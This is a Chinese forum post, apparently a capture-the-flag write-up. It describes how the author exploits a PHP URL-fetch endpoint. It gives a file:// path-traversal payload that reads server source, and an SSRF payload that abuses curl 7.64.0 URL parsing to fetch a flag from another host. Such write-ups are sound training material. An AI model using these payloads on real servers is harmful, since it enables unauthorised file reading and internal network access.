首页
社区
课程
招聘
[原创]第四题 飞蛾扑火
发表于: 2022-5-15 14:27 2858

[原创]第四题 飞蛾扑火

2022-5-15 14:27
2858

通过访问靶机,HTML源码中可以看到提示phpinfo.php,并且可以看到一个URL请求外部链接的功能点。

url.phpurl参数进行测试,发现可以直接使用file协议进行任意文件读取,这里首先读取一下url.php/url.php?url=file://localhost/../../../../var/www/html/url.php

 


从源码中可以直到需要使用靶机ssrf访问http://123.57.254.42/flag.php即可获取flag。

 

接着访问/phpinfo.php可以得知目前的curl的版本为7.64.0,在这个版本的curl可以使用如下payload进行ssrf
/url.php?url=123.57.254.42://localhost/../flag.php

 


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//